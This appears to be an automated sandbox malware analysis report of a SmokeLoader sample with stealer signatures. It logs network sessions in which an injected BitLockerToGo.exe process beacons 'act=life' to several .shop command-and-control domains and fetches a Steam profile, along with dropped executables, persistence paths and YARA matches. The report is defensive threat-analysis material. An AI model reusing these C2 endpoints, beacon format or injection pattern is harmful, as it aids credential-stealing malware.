2024-08-19 07:28:44 UTC	534	IN	HTTP/1.1 204 No Content Date: Mon, 19 Aug 2024 07:28:44 GMT Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNTq%2FnUfkn4LedEPdR%2F9Uct%2FKd%2BJYWnWCnIn0OU4fk8rkrTZ%2F2rx6wmKM2wo4PeRR8d0JtXZzM5h7twbqDaqFBkkItEJThcuptPUYrW4%2BQVEL4O2Sz3xw%2B1Fv0JbJxiw7Jf%2F%2B3eZg1Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b586db10f8d0fa4-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49764	188.114.96.3	443	7300	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-19 07:29:13 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: bassizcellskz.shop
2024-08-19 07:29:13 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-19 07:29:13 UTC	804	IN	HTTP/1.1 200 OK Date: Mon, 19 Aug 2024 07:29:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=de5mmuil2hus1aqes3hegst9nf; expires=Fri, 13-Dec-2024 01:15:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3LHO6l6qTFvsL8lS4nhrvifsFhgQ4MMDy8cB%2FawNDZj1qKJkS8bjEjEBTEdM%2B5wpjs11Kzlqv8xos4NKTkzYyUmHkGjZGCVbSMCSDaH2LRPQTQmSBPM3l%2B%2Fy0NKcPStA1ZN5tfM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b586e693cf17d14-EWR alt-svc: h3=":443"; ma=86400
2024-08-19 07:29:13 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-19 07:29:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49765	172.67.166.231	443	7300	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-19 07:29:14 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: writerospzm.shop
2024-08-19 07:29:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-19 07:29:14 UTC	804	IN	HTTP/1.1 200 OK Date: Mon, 19 Aug 2024 07:29:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6sb44r031tdao9an750gfd3m49; expires=Fri, 13-Dec-2024 01:15:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9iyXHB5pkA8z96ZAO%2BMSnLV1IrN1i4qj%2By8tRIyup%2BzUl%2Bqr9tHN%2BBIAREAb08fAhIFCde4PvU7QtjD7Jz%2BSqauwAzm6VfdQv9qkFhOIPa7CYI2x9RfUewQQ997xGjVm48o%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b586e70da70c32c-EWR alt-svc: h3=":443"; ma=86400
2024-08-19 07:29:14 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-19 07:29:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49766	172.67.204.20	443	7300	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-19 07:29:15 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deallerospfosu.shop
2024-08-19 07:29:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-19 07:29:15 UTC	800	IN	HTTP/1.1 200 OK Date: Mon, 19 Aug 2024 07:29:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tv8ak648cr9sp5rk3ngq6nks4i; expires=Fri, 13-Dec-2024 01:15:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mFGWEkCTnIvO0T8kRb%2FXPMtmcC4Wy5HjvZ4YtzZKdEmNTkTmQQgMGeapJng4ddBdf1656Y%2BZEN3AgcNybOHY7bcL751BkmYd2I0J1KC6oWqRgFNMFeD8kzn49%2FlJiRBLhqsoyhhc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b586e78894543eb-EWR alt-svc: h3=":443"; ma=86400
2024-08-19 07:29:15 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-19 07:29:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49767	188.114.96.3	443	7300	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-19 07:29:16 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: bassizcellskz.shop
2024-08-19 07:29:16 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-19 07:29:16 UTC	802	IN	HTTP/1.1 200 OK Date: Mon, 19 Aug 2024 07:29:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ipoihtibj4qj6njl9emj94v76d; expires=Fri, 13-Dec-2024 01:15:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rh1E%2BuSv24BoFz9VQPKZRyIbmCNGhtME00Uzxwy1VVrjiZjXaiJv7QEtsoGYY64S9sQXL5NSB1AY3mD0bEmI2oHBd%2B09nutnl7oCbi0eNJ7y4CCeEw6tcXqem9jOWNQK3sKDh%2Fc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b586e7e9ccac347-EWR alt-svc: h3=":443"; ma=86400
2024-08-19 07:29:16 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-19 07:29:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49768	188.114.97.3	443	7300	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-19 07:29:17 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: languagedscie.shop
2024-08-19 07:29:17 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-19 07:29:17 UTC	808	IN	HTTP/1.1 200 OK Date: Mon, 19 Aug 2024 07:29:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ouspj2q0cac9uc404mlg2bkbmf; expires=Fri, 13-Dec-2024 01:15:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LqXeIO4aNfJ3IsIPzMtjt9TE4m0%2BPu8jnzyjFcxxF42%2Bii556M3Jb0K05mqE95Eziz4aq%2FpuUblXLlnLCPk91T3%2BOkgxK763A2kENdTjXZZBxQ%2BZ8yLmyJYlSP%2BbAQgIqmVLOEU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b586e850b620ce1-EWR alt-svc: h3=":443"; ma=86400
2024-08-19 07:29:17 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-19 07:29:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49769	104.21.14.101	443	7300	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-19 07:29:18 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: complaintsipzzx.shop
2024-08-19 07:29:18 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-19 07:29:19 UTC	814	IN	HTTP/1.1 200 OK Date: Mon, 19 Aug 2024 07:29:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8gbdf15lqqc5a3uum5tp9dg2es; expires=Fri, 13-Dec-2024 01:15:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qMkWmqMP3fOIvEU7Jw2ko6WK%2FElxa9PcIu08zBmvcWgfXzvj0JLMgfQ57kuxz016C4Q%2BoxuKGYHq5FPOe7H%2FuBpA7oe0jwFgqqk488zipUIcu8zr%2FLceDRFTRivsO5mebL%2B%2FpwVVOw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b586e8b6b273314-EWR alt-svc: h3=":443"; ma=86400
2024-08-19 07:29:19 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-19 07:29:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49770	188.114.96.3	443	7300	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-19 07:29:19 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: quialitsuzoxm.shop
2024-08-19 07:29:19 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-19 07:29:20 UTC	802	IN	HTTP/1.1 200 OK Date: Mon, 19 Aug 2024 07:29:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hi4pmbo4a56eom1ahhiekis7eb; expires=Fri, 13-Dec-2024 01:15:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4y82GHz6JObWSs1CiDDDVp33IcPrRO9yLNFpbRKyeYFFRwpDwx8vjwVz60ekgJX7heVvKR8ye%2FWiembsEV42p80aUPLlSImX2SLgiP4o5iebHHRsWPDb9s6%2F3QHuQqB4QZh4g%2BE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b586e94d9bb0f6c-EWR alt-svc: h3=":443"; ma=86400
2024-08-19 07:29:20 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-19 07:29:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49771	23.197.127.21	443	7300	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-19 07:29:21 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-08-19 07:29:21 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 19 Aug 2024 07:29:21 GMT Content-Length: 34678 Connection: close Set-Cookie: sessionid=c7efd2408fce256b2c2c6cb3; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-08-19 07:29:21 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-08-19 07:29:21 UTC	10062	IN	Data Raw: 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f Data Ascii: ss': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_actio
2024-08-19 07:29:21 UTC	10102	IN	Data Raw: 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 Data Ascii: t;,"COMMUNITY_CDN_ASSET_URL":"https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/","STORE_CDN_URL":"https:\/\/store.akamai.steamstatic.com\/","PUBLIC_SHARED_URL":"https:\/\/communit

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49772	188.114.97.3	443	7300	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-19 07:29:22 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tenntysjuxmz.shop
2024-08-19 07:29:22 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-19 07:29:23 UTC	810	IN	HTTP/1.1 200 OK Date: Mon, 19 Aug 2024 07:29:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=63bin80cvv6u2qiuijj3652o1l; expires=Fri, 13-Dec-2024 01:16:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0iGUwKVSAMj%2FR6L%2B4YVP3SCUtWzPOsinHtnXNQ6RpJPsa%2FgN5fnOAu6iNY6a%2BnVJv8IRoTFj7gtsekb09XNH60g%2Bwwm4NzhfJs6mK84RWPoFfUIhAvpUbuz89EyM%2F1aTIt1bow%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b586ea52e9742a7-EWR alt-svc: h3=":443"; ma=86400
2024-08-19 07:29:23 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-19 07:29:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:27:10
Start date:	19/08/2024
Path:	C:\Users\user\Desktop\oRKal761Qm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\oRKal761Qm.exe"
Imagebase:	0x400000
File size:	216'064 bytes
MD5 hash:	BEAD29639262D9E62E74E23EB65EB480
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1869071575.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1869071575.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1868841024.00000000005CA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1868741876.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1868969005.0000000002090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1868969005.0000000002090000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:27:24
Start date:	19/08/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	03:27:43
Start date:	19/08/2024
Path:	C:\Users\user\AppData\Roaming\ssegbth
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ssegbth
Imagebase:	0x400000
File size:	216'064 bytes
MD5 hash:	BEAD29639262D9E62E74E23EB65EB480
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2175200910.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2175323602.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2175430377.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2175430377.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2175219428.00000000006A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2175219428.00000000006A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:28:25
Start date:	19/08/2024
Path:	C:\Users\user\AppData\Local\Temp\E9D3.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\E9D3.exe
Imagebase:	0x7ff69ddb0000
File size:	2'097'152 bytes
MD5 hash:	85B1854B81D15AC9116AA200304D7CA0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 79%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:28:47
Start date:	19/08/2024
Path:	C:\Users\user\AppData\Local\Temp\46F6.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\46F6.exe
Imagebase:	0x800000
File size:	15'523'840 bytes
MD5 hash:	E624D8FC1206C879495A1F3A670F253D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000008.00000002.2941945429.00007FF7CE067000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000008.00000002.2923398094.000000C000F90000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000008.00000000.2678731371.00007FF7CE067000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Local\Temp\46F6.exe, Author: Joe Security
Antivirus matches:	Detection: 32%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:29:10
Start date:	19/08/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Imagebase:	0xf90000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:30:01
Start date:	19/08/2024
Path:	C:\Users\user\AppData\Roaming\ssegbth
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ssegbth
Imagebase:	0x400000
File size:	216'064 bytes
MD5 hash:	BEAD29639262D9E62E74E23EB65EB480
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	21.7%
Signature Coverage:	50.4%
Total number of Nodes:	129
Total number of Limit Nodes:	6

Executed Functions

Function 00423920 Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 242
timememorylibraryCOMMON

Download Yara Rule

